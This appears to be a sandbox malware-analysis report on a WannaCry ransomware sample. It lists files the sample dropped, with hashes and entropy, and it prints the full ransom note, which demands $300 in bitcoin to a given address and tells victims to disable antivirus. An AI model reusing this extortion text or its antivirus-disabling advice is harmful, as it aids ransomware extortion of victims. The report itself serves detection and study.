                                SSDEEP:24:zeXTUC9jdBY2nHtGz8QFm4SpV6q3bw/zxCR:yDUE9nET46q3bw/zxG
                                MD5:54246A9F0FCEC9ED45D9A3C2B70B02AF
                                SHA1:B1E03E202D0C97D0DA7A0A6516345C813E13A2D3
                                SHA-256:F9305FD37048185C1D1A5D3ED3DE5AE3728C67944145B9456C936567DB377A01
                                SHA-512:3B5C5B792E8052F0A99DD8F921A03E68AAD374E842DF7EE15ABE77DF83BBA5705BD0997D7F62A3F49CFF1F4F92BE4114E6EF557A702D0DB5967D195BFD274864
                                Malicious:false
                                Reputation:unknown
                                Preview:.....S..p.....M...9..k......q.#.{1........p..........HbH..].v..E'u.p+.......)..........mL1....pk.>..U....9-i...m...-%&...C..V.$.7.f.....u.=.'ztI.\.....M...@]..x4'.......[....Q?[...t.V.....:H.....`d...v.'7r..D`...b....R~1..+..Z.....^....9.V.c[cH.........~y..?..8...f...i+..eX....d..a..s...(.5$bO.+...in,0;..".C3..Wj.."ep)-y.h&8A..&..G.`..a.D.y.~3.......};d[.0OZ..G...g...j%.[!|o..Q!......VS...L..Z...M[..[.g...$..Gk*1.~..|rh..~JQ.N:m6..P@....,}..1.>6.#..s..um.....r..83.."D....3$o.$..L......Qj..`}J./..h.a....e/.vM.+9"_..{-..T]g...M...g;..C.]~...KI0...E.R.=...k&.....k.kv..K.^.4y....e.A.....*~....k..]'i.)N.6...G.<\..TV./.~3..<......z".]...1%.<+.P ...|KX.c.\.O.a.b........%.4.......6...<...-..SKv...U..!..Z...>.0.@..G. A1."g&..n...ae.B.:...A`F.,..F..Y.....iR.k..tk`......T..:....0.=}.V!...r../......Gn..!.-yt3~.V........K./.J....C.....5.D]H.,......2.L...4..Y.....|.?R_...rC4......a..u.e...t.C.9Gz..<^.^...`"#b.....\.BL'OH....!.A...|..8l..& y.6

                                C:\Users\user\AppData\Local\Temp\86.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.829132987519543
                                Encrypted:false
                                SSDEEP:24:5ABY+kGVOEROgdZTqqDE+6cg0ZB+cbVwIwfh4kZrjtfx97c:SBuGLzVuc+Iwf6urJ7c
                                MD5:58401FB12FBB64207691546CC1D1C8DE
                                SHA1:20EDCA403D3F497EAB64BA1F9B3FCE75741EC8E7
                                SHA-256:D0ECD85F192A948EAA0A378BC6AF08E27E43C3BE51ACCFA296C30AC36833F01B
                                SHA-512:33032E4FFD554305065A0E433855242DAB29EE7C6A4B55E7245D40DCB2772D22E97533F24AC7F60338CDE10DAB992C9795CC28B20621F197E0223917EBEEFB30
                                Malicious:false
                                Reputation:unknown
                                Preview:.....is.YJr1.._,.j........Vg.}.#.mLJU.\..0e.M.a.C...4...r.EW.8..T....r..+I....zK.I.N...9)...a...B..D......WS.[.G..?Nx^.tZ'G..17G.Z.W,z...'@k..p....`...i`p. s..Q..2'...f...N....8GJ.K.5...i.#.-.e.q.P.L.-..X.Q...O\.v..R..V.......0~..q......[.A.=.e..--#W....5!.\``4..v....{..o....'.hf...*..V&......>..9.4.x.zk....t.9..p.:g..WC.=..;7..7..P..G..FF...g....F.2dB[.F0S.iJ.1y.!-w..~.6w0.;w0.Ok%{\P.....{.)..lW..-...Q..vP..|s-....ev..e.....!..f.e.#...W.{5Zq[.pv.o..9Vy....R..*../..Y(|..%9.?..........G.......j|.6.....w.G.g.H..|....fb.A;).[.$.C.-#.\..JY....j..W...f!o..2..T..\(E.i...}JCT.oT.o..G.,n.V....K. ...p..]....Z.Z..r.....pes1.....x&.X.l...T%..vZ.....B.^..e(.V._....Uv.w.I.........Sq...y......v..m....../..<.28...1..B...pL.2..pQ.N">vVI.`)@.. .4..|.....9_....a......p]....p.Q.......7..,..Y..6"S...z:<....HI.<..;`...a...L.~...n...<.X.n..".z....gj.!.I.+.w8....{..(..Fc.....5..........)..sr3.....Z.|`.[`..c....._"..g..d.=..a..t.l.S_|g.^>...b._p)]Ty#m.}..X.Fe...9...D.

                                C:\Users\user\AppData\Local\Temp\87.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.819752227099647
                                Encrypted:false
                                SSDEEP:24:/HWaNUzGT3InGK4XduXvqNsFL2+3epyNXBJaz+xhLsiqEF:/HXqGcGVe1+yZazKhLxF
                                MD5:D19869A107385A44A62379D03093602E
                                SHA1:833D57810D30680E02B660EB563BB04F4DDDF5FA
                                SHA-256:33EA6E1DFBCDC4798810550352B572B834CFBD4A6AA9AB89371548C95E1D7C21
                                SHA-512:E9E114F004404776BE3CE4EFD89A766875CF46608C845092B092E31A6CA053CEAF8AFAC7B98F3631369F70443369415F86DD4005B81B3FFE11A8772D77864238
                                Malicious:false
                                Reputation:unknown
                                Preview:M..8\.`.0iU.4....j+.n.|t.=.K.f...w.j...J.yq..H.*..X.=.....bh...e..i.E..y.]..G9M..S...yV..&pha.m1..'.!..(.>.;......"-V....i.....b..[...@^QW.~FZ..;y..i.@.T..}.wB.3....$........I....N.K.\.^..\..3.N...F...n._E....WI..BOR".>...%.mys..........1....J.{.....<.+..u...pY..Y....(....w...|?,..D...r.f8.4Z..f...Q....v.XY....4`TT8...b2./.:y;.g..v<....H.a.@.c?..1St..M.H.k...`.N...Vk..U..........E?.g"...I..l...YQU.N.T0..-;5V.....1.:6\\...{..fk.XA..?..W.l%(p...<.U.9..........:..m..p.......:%.. p......+...,.w......Pb.Q.?.K.P.Y....S.=M..sX*t....v..~...q...5.*...{^..$|.\K.Z.I..9}..p#)...8l...HrP.T....Q.M.....l...?.m.....a....$H.?E.d".8....(....&..L.:.,...o....U......QX.}i4(.|j.H:>>..h.d..l@.:..P.4..`...z.D...(.8.^..{..m....R,.f..Z.n%...f...-.>J.it....\W<@6...Up...W..A+(.@g..wJf.6.p6. ..m...@.C...o.zbN..R.X|[......}<"......Z...'.:0dk.j...r..*.3[.j..d9..Q...R.......C.o.SDv.R.2.;/.k~.Z....}s.y.lKZ5...r+....I......Cm+..X...U....!.Z.Eb.jd..*D.9r..x."..l..zM

                                C:\Users\user\AppData\Local\Temp\88.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.804780018876966
                                Encrypted:false
                                SSDEEP:24:9D31lcqYi/49DE8dppMbsuONsnbj2INWhuUWn8dLuV40pPArA/5G1:tXYm4DVMbDu0uCdf8dLDyA+0
                                MD5:C231839DC1C5CE1D32565E2FFEAC4FD8
                                SHA1:8A99C026BAD317D1FE7CDC4F9E1EB8EB4C7EBD67
                                SHA-256:560DEE3466145A22C6F1C42878E64BBE48FDB0A1465EA73AF2704ADDC307B780
                                SHA-512:87ACD03D5A43AEFEE06654E7F3A01E8BEFABE4C4CD3720E959B6E52A8B17656B9A8D958DD4BA1B25FD6971345C4B6B3443ED14CCA76C443CC71F1BC31A0C8FF6
                                Malicious:false
                                Reputation:unknown
                                Preview:.."HS....E0...L..Q.D4#..jy..V..[c...]/e.G.^........r...5T........QM...h....^..........`...s..,.m.a.A.k.L.Gi...XM.......wX.{00.....4\..e4|.#.}..F. .r..8..U.l..*2....rj......Cd`.l.hX....cx44.w......K......T.z%......wmC.hB.e.....p...GP..U..7.............a.;D...P..&9.@\..xx.#.R.N ...)X.k...\...W]T.=..e..s....0.KQm..+0.9..oY........x.J3.b..6RBMFg.?......q.98Z....9..0x]..x.U..`$.....6H....E.-..p......E..:..J....p....]......wv.46..........J.`.?..r...........4...=.b.....-..j...{....R.-.Ql.V9.:T.Og^..n..G....~:x.@.]..b........`5."...k..rg.Y.7..A..f....Q..9PR.Bg~..Z#...[......".QQT.9....l...xS]'.mR....."....(.8......G....3/....x...<!w.Z..K.....!.D.Pdg...j..o.;.'t.u%...r5%....K\..J...5.......d..n.w.b.U.W.....t.v.J..G....NC..^...=N<.+...$........;..8.6.~...[....C......`.~*.-..$.v........E..4.q.z4!J.{.......Bql.7c....G2}0.$..Wp...E.........A(!......:.3.3..n....S.kX^.l0w..s.f".)...B.Q.R.}.]X.......o....._..U..Asf...9.~n..i{.../%....9F}....V.

                                C:\Users\user\AppData\Local\Temp\89.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7890687824907205
                                Encrypted:false
                                SSDEEP:24:ClEYDtc3FsjP0ognDgAxuIRvgnthzfZgaBciLY0HHcQaFhaV:hYwEVIRq3f9jyIV
                                MD5:F7343BD5F29B8C58BCFF3E614D4D38D9
                                SHA1:829D7981456455E37F4655D40DA21351FF4F9DEB
                                SHA-256:ACB3AC32CCD3A9A8BBCCE408C0A2872647A30619FBF74CFF08526F35BC16A3D3
                                SHA-512:9167C3A6C071AA543FFC3002CB370D9595E96C648742707CEC192F6174FE09715AB9E118D6FCA6B3B7F9EB7536783B60ACD4E6AB9376FDBFDD1409AA1400D719
                                Malicious:false
                                Reputation:unknown
                                Preview:d...($..f8..|.0.......D2....^D.S.8.NL..j.V.P..@.h..vw.....m..)O&.....r...7.v..zJj..n.~<....LU.j....Z.h.H.[....M....s.C.C..'./....+:..'..)..'....JF=.+0..u1.5.U.tR....6.I..Yx1...0'.Fx.......4...Sg....EA..s..}.d.4VZz..}..*..^\5.....OY...g...kT.SJx.....H..l..0..%.6.?..Qo.qD.....x..Ro.Ni.ld:I...Zb....L'T....o.y.o...u.....>r...D.....rRQ-p..O.K..r6.@."..V</..1.)....qw.*..).1..<t/.!...9g...&....Z.8t.....a.q.&ey..C..y%...o..J1{....>.h..?&Z......W.k..............d..).TJ.L.X..I..e...1r\.A.m.".G.|(c........`c.j..y.V..aeX...?.L.mZ..U.bT\s.O..]/.*N...........NMS..!x=7l.!.~.....6....G./.........a...V....2.g.L.t...o...*.F.....!.>.^......8......d....EQ.0.x.+U!0.C.}<R.,..G.DS..{0.x..@.^5..jV......<....|...........E...o....s!s.=.@....p...s+3O'....$0..K.~..e2...3.cw+.o.1.}...Zl.R=..Y...,.....}.....%.....P...;uk.......Q.>C..~aYZ.V...S...g.....l.{.}.......k.(.ep^..Z...]..'~.9.......v..XM`..!1.4."......8.i`..q....5y.G..).u..T/...........'..nJ..;yS+

                                C:\Users\user\AppData\Local\Temp\9.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816065791627852
                                Encrypted:false
                                SSDEEP:24:XA/QelHQdzx7sNJMHdzY3ACH7mfWfi/TYr5WBcC+sgx4iqINeW8Tt:lelHQd14DtwCyefcMWJtgjNb0t
                                MD5:BF4C2365BB9FBCD1162E1EC258549B0C
                                SHA1:561D6664F94B1297EB4F006EBD2AE32E357B3B25
                                SHA-256:B73EDB43F6A87BF019147BAAEF3EE4EFAD7ADD9EA407D3C8E86C958D9FC2C6D5
                                SHA-512:07E49F772AF37F485224C6A796F6777638DEBDF07C943D989CA860256305757A52EC58CF665EC382175C55C2A95EB55B0C3CD8C53EF37A8323A38A5C0FC6B50D
                                Malicious:false
                                Reputation:unknown
                                Preview:....6.w...5..l._.".._...HP>e.8.k...3.7.HQ.......xf....XAH&....9.[J.j.w....[O...M....v.5..jx......>.53..c....;...5pz.P.D.a...nu.,....N.j....HRK...x.}3..k...~t......@.=.0.Z...$?$....uc.XJd;Y..1...I?............H.......L%n...X.y...K....{s...d.~:A...c.zh..........0.......W....8."..z...2.@QrA^.u..g...]..G:.6..1.$&,......8.yBN.....~.7..i...y....`q.Q%raE.._`;f...9.........3&....Z..)....q\..,.w........u".V...gac..Z.C../.h..ud..C.p.w....0...GI|.7yjt.....n...8BI.}+.u..T. ..KE.......L^..PeS.C;.AF.Y.....-.h&.....-..6,.Z.!..].x;../...f.$..U....^.}.^..K..1.#)Y.8b"gnF..X7.<...g..[.).......Q@.AiC..a..W.sy.Y..'...k..1..\W.2.V..+4u.C.J...f.6h.@QI.a.-u...ODo..8.s.e.... ..8...q...c..?.r.vl&.b....E.y1j......w)U...o>]et.....8....M6...5.....>.V..S. .....I8.......u.j..'.......9z@.g.i....rP:.H*[..xgn..Mo..e.....s;n#~9...J.?.@.A.u.?.|w....{.2.W...6$.L......f3wR[aQ.d..> ..2.].).\...1:-.g4OO..7...c%.Y..F@..F.5n.U.f..D:......9..E`5ltic~....$.F.3."Xh.pO....y..

                                C:\Users\user\AppData\Local\Temp\90.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816974575934229
                                Encrypted:false
                                SSDEEP:24:ZJmBGAFzpnwj5id5X0BsVJrHa+j3Vt8uxXelyeCrDI0zS:ZJDuzpwiX86Jr6mz81T+cIS
                                MD5:C2D45E591B2BFB07DE3A63CFC11AE1EC
                                SHA1:09B378A13C3A9C37068E7AC5FF67BF4172C85F63
                                SHA-256:6E403983BE0D65B884610200B6D2024C38C668E92ECC3321D6167F0EB8EBD67C
                                SHA-512:06B2E34D1EE65298A9813F3440E80B9CB4B1703EF84576769D79DDDF05A6AFDFF9CC3121DD29AEEED3F5BBE28D4D60D88E64AB38478061F13E20498838E1F172
                                Malicious:false
                                Reputation:unknown
                                Preview:.........jW.x#.C..71_.....b....}..m...1d42...e...8..@`@...$..(.>.V.}3.v.w..?...A.!Ke.e.2.u~...G\]...._t..2....u....O .e..O$]1....?u..W..y.O.....{!....s..AI..ZfZ#.o.......(.GE...+19\..(..)..M+8".?...$.c...!.9.[.J.o.....1.]..n....[.Z.E/'"D32m.....B..$.t?.4o.&.l ..O.6$...<ig..~...,.of...s/./.......q....+Fv|..+...M......f.e..I.+..1..Jbb*.d...>.3c.!iW..JH....H....0p.K|,.R...=.^.....*5T.EN.&.E2.j.....h<..3 S...o"3+....t.._^|.5..s. .4S[.eV.`.2..........e6G-h..E........s.z..[.I....E...=...|.b(....T.M..9@..q..H5R.?if.........a..u.I.h.\.......H.[/(....l..I3]m./.tQ..P.={~~_.C......!.\Y..G 3......y.h..S.7.&...).h.)\F..~.rh.G.i}:(...ya.......l...,;.d:...e.z.GTi.b_.X......K.9@t..y..g..YL..\.].R%L!.......L......K...e.6.>.....UW..\..d..C)...lSD..t{...)!W~,?...j0..%.].....8....&v....S.$..`.4.R..j........`N.'2...D...YQc.......'...YhXxQ:......2.'j..c..v...].0I.....eP.5h....!63...$.Y..h...y;.x(...}...@.z....W.......i.M|D.h.a:F".q....l.....d<lL.....`....f....Qx.

                                C:\Users\user\AppData\Local\Temp\91.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.748464623869378
                                Encrypted:false
                                SSDEEP:24:+/IwmtBIok4HuDmTQ+YgFik8GZi/BFgYXyYNG:+/Iw0xOs3YgjZi/ByYa
                                MD5:5FCF31736EACB90E0BE98D0BC6748C2F
                                SHA1:4DC0996AB9CC9C46A034891E37EA6056F64552D8
                                SHA-256:B76993FBBFC0E7B390D96D1BAE8618DF9134F90C6718A7030FA2B8632294D9ED
                                SHA-512:4A620580609D771BEE02DB009F344920DF5C459785432C034A1F55D1855AC54165516070A84C776805B930A6E41447B9D21F234B0F333F4C51F6E7C736A5E766
                                Malicious:false
                                Reputation:unknown
                                Preview:8..qc.!..D.T.qZ.."..9X.i............r.#....Wi...[..y$.9Jd4]l.+n<]...9n.1..\.......P...Um"o.7...<x.L{g...\......C.X..p...%z......O...%_^0L!Qr.|2.U...2.v;7..?tO"..3...*m-........"..l..$.W..+..Kh..7.........T....r.........P..^..qy-...h....."d.dT.rC t....b...o..>...C`..g..=...O.T.U'F..K..|g$E..hF"3.Y..C......EL.u......_,.)...b.{.6.U'.,..+......H> ..j.j...~d.h|.#|...T...m...@Q.....*!w.....u..l.`I.5^.w.....]b..}..i.t.N..LB...s|.\i..d..n.|....+D].f].1..-.0Bz.6.S...F..v....>.6...k39..."....OW...../. ..E.0C.......V.....b. .iI....z..xTu..!|.....K8....y...I.@.)`.....tV.C0.X..*..0...Qd~K\...I.:/...g..L.".o.`P|h...N..~E...g....1..9m.nE.jE......d+C.Mk...>9q`h-n..[.x.)..,.z.7.....fe..1....)....,...C.._.L..\.%...B.:.N..<.}....x.fE..f1kh.....%(.Og...I]...;x.SVgCS.i..1U.H...j8.d...@C.....#...Ji.+7,.Q..`..z..IC.1....u.C@&...... .{.....W.2!v....7.:.E..Uw.?F.....C"V.B..b...o.....':........:[..L...........(.+.... ..!c..aY.4...a........C.4.E.."...tT!^M..{.^.!...l

                                C:\Users\user\AppData\Local\Temp\92.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.821736657797796
                                Encrypted:false
                                SSDEEP:24:ox00OXrinJmitWAYKqJhxtdImlXJtaUYoXPnO9xuCC9fMRLmJ:oJObgJZtbqhImlZb/O9kfSW
                                MD5:FA4B7799C649E18CDFD9C2D7DEDCEE91
                                SHA1:03EFAA14F650E48677537F7F88A7E6B2BB0F42A1
                                SHA-256:5FF9E5FCBAB200E22DCD20F717BD758E0FA222D6FBC9C95F994303F9C121F632
                                SHA-512:F33EEA0D1EA75657CD05A3DD22EC1913C5D2E1045146826D360CD69CBDC3707BA3FC2D18CEF24271364B224F2F136B5E97500AF6477C13A920E003B4B7411A74
                                Malicious:false
                                Reputation:unknown
                                Preview:.....^..4EAi.=..JO.d.L*..2.^J......_.i.......`&0P...AG.4..f......>..seB.b..'@...H..A..*......f.ujq.~o,9=~.`.pN.j.EH...V,....Col~Rh.9..J.].\lF[oN......JQ9...X........~......p.7#I......*!.K..=.e.6..aEe.... .:.J.(...........u..].....+....g.E.Z%..`.......:r..u...A...x{.K..}./...Md..v..gb)....1.>.;......).S.x$Q.on..;.0.B0... FN.m.gF^.<....T..~k...RD..f~.1Q5..-J........L...../KX.i..\x....P..c.7k...}.].?@..........n..YNe.<0..*.+.[..._....,.......|p..Pi........B.g..?._.}8.AT.`....N.v..B.E....m..).n..d..T@.......?.....`....Lz|.Ylk'.....k..d}Tju.....v.....f..b......`...A..7./.R..d.H.......!.HB...s.K^.#\...Q.....1Zj...0.?...........<\t...u.o.._.......xcZ,4.X.!..D.W@..........)..VU0..D.<..+e.:.,..4.5.........ZA..|.S..L#..3.9..r.yQ.....q..@mwp...c-.b.F;d/_y.xR.>..Hh).yMt..e....q..=.0.a.U.]~..\Y.=.Z......<kM..X....V..`.}.1.^d7.....4l.8........)~...Y..z......:ph.ee....f....L.../.LE"b...B..}.V..SbT6.P.g...9.[..6......0g.6Q.R....~.J...&..F.YT)..I;\.R

                                C:\Users\user\AppData\Local\Temp\93.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.798945641474471
                                Encrypted:false
                                SSDEEP:24:Of65gI3p8oIb5v9ZWblQnNdochn9ZOBC9RhrdPLQ1wr/dK6:C83p8NNoYn9mCBdPVDdK6
                                MD5:55F0410C87961EE951EDA57A3A15223A
                                SHA1:236BB0E545382D0D767DD26647EFB07960B24523
                                SHA-256:6231E2BA2F03609A39DC28E1296B799B6B22E6345581D7EBD3B407A9B7CF4DFF
                                SHA-512:6F2C71447FA8F385A51290088A93430CFBBBC13FB1CB28040A9FAAF9716F3E84ADA50BFD9ECE6F1FF44651933611FEF70FB611814D7AB5363350314633667A57
                                Malicious:false
                                Reputation:unknown
                                Preview:.[..Q& b+C........&Xl?=_9...N..VF.:Ys`+....lW.3..k.$...<6!.......|...e(<G.,.Fe2......SP5I...+8.D..c=...8...M.....;..$p...DM%q..........8.........h..R.e.....L.v...w..K....g.dp......q%E.4.M....a..-.%.\..&...Um.`..d$?6]..~...T>5Op..`q.R.xiR....+.....$J..1...7@\I..HV.e.v..FU...f.q4q.Q.S......}=...2F........f....K.....'5a'..,1......&.........G.Xh,....,.....x@...58...... ......[.....k7.q..c.Q.X..m.0{..:.=.N..=\w...D.8.Ij..P c\.F.)f-.iO.+..hp....C..x....SD.8,s..n..J.. .>..=..2...~^...W.%..2..{79E.Qt......#d5>(..W......l.....)'.F.....@n.....%.C..c.v..N.}..;.....W.C.~ph4..t`....+.D[.Y."......~.s...0..6v@.ZB)t....6.S.........q.........p..Q.?y.}..._p..8..@E^..+2q.v@.; ~.8~....\..y1Vuz.'.,.%../.j....sQ........v!^.-y.B.H..../.?./.;.O.b........7v/U..V.x.... .T..t...2.A#3NET\...0#..m...<.+>+.3~(/...X[.$..%.%C[.......2.C......e.N..0.W.XP_;;...k..'.....OD..9....H_3..5.../.7....,%.uX..L.C...bHT.E.=Pr.v.....w..Q?9 mM_..FQH......Z"..uD.D..v..>...A...

                                C:\Users\user\AppData\Local\Temp\94.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.811179423008834
                                Encrypted:false
                                SSDEEP:24:RiAOXebtyU4Sr3tDECOeMHtsXvaYJKBVasMJ4YGFPjqh:RVDbtvDBKeMHtkiYJ0TYQj2
                                MD5:80B7F146405BDE958A0118421809840A
                                SHA1:F9A740FFFFFDB94A8DDAB5F434457B5A07A3A2BE
                                SHA-256:489400DB440459DA81B1C2C0CB0D0E6AE4F620FA8625B374D00728A71C6686E7
                                SHA-512:A32FC3B3868A0A5EC4027E40918FF352090CD40FA1CBD7EAEF2DA96A494D60DD8A58B34D56A57D8388B427077F32AE1EBFE162808508647C8594E15C7211B9EB
                                Malicious:false
                                Reputation:unknown
                                Preview:...F..`d...._.s......~."..I..8.m\...m..l..........y.?.6V.(spP<..*...*...$..?.R...4l,\..#...csJ..*Qg.\B..."7.S.s...XF+/!U.1<...W..!.)m@.....;C...c.f.n...{Zo.2a.#.WT.....l.Z.~.......F..-......d.;Z...5j.}..E...:..G.......1|s.G9...a..HLCF}l...]...N.1)ki......r ......E.h..te..4..Z..&z.......E.MA..1.g.....B.F.1.`o..&...n./..L.-..k...8X.\......N....8-.....:/M5b}.r.R.f.N?..8.zr...v:y.._3.....'y....J.=...f.Z..A#.Nuj...g.YV:.....P.......).L....J...c06....W.)9;?.._.-dm...wQC..'..."q..l........3h.t.c.2X.s.qyb..uG..../5D&..~.gJ.....U{...[....:.y.~..)ko.s5......Y...4.. \';;*..i.B....Ll.0..#j..n......%.M...._..oY..j..B..:.T....F9B]..T_'.q..n.....^j...v...nG)..^......0.F.'*"..]..Y...m.....n.D[.9...b2._n....(.Bp[<.^PO.(2E.....x....y..:.Q.5_.....m."~.<...t.E..T.)+."...d...eOA}s.}..(.....J.S.E.f.w....b..m......yA...r--......LH.{.bW._......O."N.:..nZg..........%.q3..e.7..|.:....3....y...ug..3._..0.%$K.pU...C.e._.wi.*..}......%..>\.....w..G.J.X...U. E4..e...

                                C:\Users\user\AppData\Local\Temp\95.WNCRYT (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7834522779236845
                                Encrypted:false
                                SSDEEP:24:BwQ/rj0jYEh7UtD2r06bzAFnAeqnahwP7VS:SQ/r457TI6opdqCwP78
                                MD5:80D963B9CC37AB3C327BF6E628BC376E
                                SHA1:2EF8AA9A691EDBF0ADF3C6EE2E8555D478C7F6DF
                                SHA-256:F81AE5D8830FA56F477C0E89590CDDA87EB508C086FF363BBA3F84E2E8A86CD8
                                SHA-512:CAD9D9476E5348B195461156BC81A2CE5B747186EB48AA1EA82D6D9018D1B97D0BED4B5E97D0546E304668BD707598AD4FECFEB8691B0538C2EF748446CAC756
                                Malicious:false
                                Reputation:unknown
                                Preview:.8../..LR.mS?V.E|...I.(S...2.5m.D..\.l.....F.....v..L.2i$.oe...R ..n......].:h:../~f..:.L)v .(g)......+..N..<..E.B..&.>:a@......V..~.~....._..o..6.?.....M[...S..).3ij...{T.X..k..| ..p.JbS.s8...3S...uaO..PoC...Vd.b&.....H8..A.`p..69Vcv.f....j.4.guV......>D......A....|sX. ]X.2x...'..v...)....U...~...Pw..#..[E.."]m..u..c.~..]....}..s.=oz..9.v....?..X.l...)./.Q.....Z.....GbP...}....54...w....oOU..0....1V........4i....S.LY...;....u..<....>...c.3._..O....f6N.a.&s.....P..g5...|..lz]..!|/l..h...].o.n>S.a.@....>.;.t...C.@-\./s7.....x+.!Ck.._.z."6H......Ey..M.?.z..2*...W.{&.+..%1.......o.M..a!.7.........1p.8..W..IX.l3..xC......O..}...Tac_.........}.0..8..5.dq.6SXna.........../........E.......,.....<..0..._.4.m.EtqD"..........J..............n[.E|x.N......0s{VP..( L..(`!);{....Z.]...%.........^......M.25.J.}..SEFg..6..Md..3..h..p....2....X..YqP...g~..x/_)...f#..Wy......)./z.......Pu.wlc.../.h........?.e.....P...8..L.z^..u........p........e.C...i.~.q..%

                                C:\Users\user\AppData\Roaming\Microsoft\Templates\@Please_Read_Me@.txt

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\AppData\Roaming\Microsoft\Templates\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):52120
                                Entropy (8bit):7.996175589039157
                                Encrypted:true
                                SSDEEP:768:94l5ZhiuM1Q6j8k0IKPoSUJLSnc0YHMNhOOaAVAQ7ZecUrEcnJpb+g/OdWm0RF:eXZhiuwjV0xPPGS4HMNqLc6EU9+eOuF
                                MD5:23DF858D272A0C6CC0E05BDFAA7FAE4C
                                SHA1:50B8EF93C001B00FEC953DDB0FF315B4A3DA7370
                                SHA-256:1DB8E4715BCEA2332C907F644FD72E45F77964B7DC89D892BBFA8D99254A81BA
                                SHA-512:0812F5B9F93D4C2807CB3CF1D6EA4DE86ADA74DA45EA463A1CECA24C26508A3B3D4389BF535A535FED09D6455822F0E5B703010F8D6E9E5B40CBA757416A8236
                                Malicious:true
                                Reputation:unknown
